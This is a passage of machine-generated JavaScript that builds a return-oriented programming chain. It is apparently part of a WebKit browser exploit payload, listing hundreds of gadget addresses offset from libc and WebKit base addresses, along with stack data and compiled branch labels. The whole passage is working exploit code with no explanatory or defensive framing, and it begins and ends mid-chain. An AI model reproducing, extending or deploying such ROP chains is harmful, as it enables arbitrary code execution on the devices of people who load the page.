db([10, 0]); // 0xa
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+232136, //L4133
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4133:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+232192, //L4134
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4134:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+232328, //L4138
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+232312, //L4137
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4136:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4137:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4138:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+232448, //L4141
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+232416, //L4139
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4139:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4140:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4141:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+232584, //L4143
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+232600, //L4144
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+232568, //L4142
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4142:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4143:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4144:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+232760, //L4149
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+232776, //L4150
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+232712, //L4146
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4146:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4147:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4148:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4149:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4150:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+232888, //L4151+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+232880, //L4151
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4151:
db([0, 0]); // 0x0
set_gadgets([
ropchain+232904, //L4151+24
ropchain+233304, //L4145
libc_base+764760, //pop rsi
ropchain+232944, //L4152
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4152:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4154:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+233064, //L4157
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+233048, //L4155
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4155:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4157:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+233208, //L4160
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+233224, //L4161
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+233176, //L4158
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4158:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4159:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4160:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4161:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+233296, //L4162
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4162:
db([0, 0]); // 0x0
//L4145:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+233424, //L4165
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+233440, //L4166
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+233408, //L4164
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4164:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4165:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4166:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+233600, //L4171
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+233616, //L4172
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+233552, //L4168
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4168:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4169:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4170:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4171:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4172:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+233728, //L4173+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+233720, //L4173
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4173:
db([0, 0]); // 0x0
set_gadgets([
ropchain+233744, //L4173+24
ropchain+236960, //L4167
libc_base+764760, //pop rsi
ropchain+233784, //L4174
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4174:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4176:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+233904, //L4179
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+233888, //L4177
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4177:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4179:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+234048, //L4182
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+234016, //L4180
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+234032, //L4181
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4180:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4181:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4182:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+234128, //L4183
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4183:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4185:
db([80, 0]); // 0x50
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+234248, //L4188
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+234232, //L4186
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4186:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4188:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+234424, //L4191
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+234440, //L4192
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+234392, //L4189
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+234408, //L4190
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4189:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4190:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4191:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4192:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+234600, //L4196
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+234568, //L4194
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+234584, //L4195
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4193:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4194:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4195:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4196:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+234688, //L4197
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+234704, //L4198
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4197:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4198:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+234872, //L4200
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+234888, //L4201
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+234856, //L4199
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4199:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4200:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4201:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+235048, //L4206
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+235064, //L4207
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+235000, //L4203
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4203:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4204:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4205:
db([1, 0]); // 0x1
set_gadget(webkit_base+3236123,); //pop r9
//L4206:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4207:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+235184, //L4208+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+235176, //L4208
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4208:
db([0, 0]); // 0x0
set_gadgets([
ropchain+235200, //L4208+24
ropchain+236584, //L4202
libc_base+764760, //pop rsi
ropchain+235240, //L4209
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4209:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4211:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+235360, //L4214
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+235344, //L4212
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4212:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4214:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+235504, //L4217
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+235472, //L4215
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+235488, //L4216
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4215:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4216:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4217:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+235584, //L4218
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4218:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4220:
db([88, 0]); // 0x58
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+235704, //L4223
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+235688, //L4221
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4221:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4223:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+235880, //L4226
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+235896, //L4227
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+235848, //L4224
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+235864, //L4225
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4224:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4225:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4226:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4227:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+236056, //L4231
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+236024, //L4229
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+236040, //L4230
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4228:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4229:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4230:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4231:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+236144, //L4232
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+236160, //L4233
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4232:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4233:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+236328, //L4235
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+236344, //L4236
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+236312, //L4234
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4234:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4235:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4236:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+236488, //L4239
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+236504, //L4240
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+236456, //L4237
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4237:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4238:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4239:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4240:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+236576, //L4241
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4241:
db([0, 0]); // 0x0
//L4202:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+236704, //L4244
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+236720, //L4245
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+236688, //L4243
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4243:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4244:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4245:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+236864, //L4248
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+236880, //L4249
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+236832, //L4246
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4246:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4247:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4248:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4249:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+236952, //L4250
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4250:
db([0, 0]); // 0x0
//L4167:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+237080, //L4253
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+237096, //L4254
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+237064, //L4252
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4252:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4253:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4254:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+237208, //L4256
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+237256, //L4259
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+237224, //L4257
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4256:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4257:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4258:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4259:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+237368, //L4260+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+237360, //L4260
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4260:
db([0, 0]); // 0x0
set_gadgets([
ropchain+237384, //L4260+24
ropchain+240664, //L4255
libc_base+764760, //pop rsi
ropchain+237424, //L4261
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4261:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4263:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+237544, //L4266
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+237528, //L4264
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4264:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4266:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+237688, //L4269
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+237656, //L4267
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+237672, //L4268
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4267:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4268:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4269:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+237776, //L4271
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L4270:
db([4294967295, 4294967295]); // -0x1
set_gadget(libc_base+759608,); //pop rax
//L4271:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+237832, //L4272
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4272:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4274:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+237912, //L4276
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4276:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+237992, //L4277
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4277:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4279:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+238112, //L4282
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+238096, //L4280
webkit_base+660161, //mov [rsi], rax ; mov al, 1
